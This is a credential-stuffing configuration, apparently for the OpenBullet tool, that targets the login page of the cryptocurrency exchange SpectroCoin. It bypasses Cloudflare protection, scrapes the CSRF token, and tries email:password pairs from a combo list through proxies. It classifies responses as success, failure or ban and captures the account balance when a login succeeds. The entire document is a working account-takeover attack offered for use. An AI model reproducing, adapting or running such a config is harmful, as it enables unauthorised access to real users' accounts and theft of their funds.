[SETTINGS]
{
  "Name": "SpectroCoin",
  "SuggestedBots": 1,
  "LastModified": "2019-02-21T00:02:00.1994427+01:00",
  "AdditionalInfo": "",
  "Author": "1-EvilBear-1",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [
    {
      "SliceName": "PASS",
      "RuleType": 3,
      "RuleString": "256",
      "Id": 42690356
    }
  ],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
BYPASSCF "https://spectrocoin.com/en/login.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
REQUEST GET "https://spectrocoin.com/en/login.html" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"csrfToken\" value=\"" "\" />" Recursive=FALSE -> VAR "TOKEN" "" "" 
REQUEST POST "https://spectrocoin.com/en/login.html" AutoRedirect=TRUE 
  CONTENT "csrfToken=<TOKEN>&email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: https://spectrocoin.com" 
  HEADER "Referer: https://spectrocoin.com/en/login.html" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Incorrect username or password" 
    KEY "User account is not activated." 
  KEYCHAIN Ban OR 
    KEY "Access denied" 
    KEY "Please complete the security check to access" 
  KEYCHAIN Success OR 
    KEY "href=\"/en/account.html\"" 
PARSE "<SOURCE>" LR "<div class=\"col-xs-8 text-right huge\" title-tooltip dir=\"ltr\">" "</div>" Recursive=TRUE -> CAP "Balance's" "" "" 
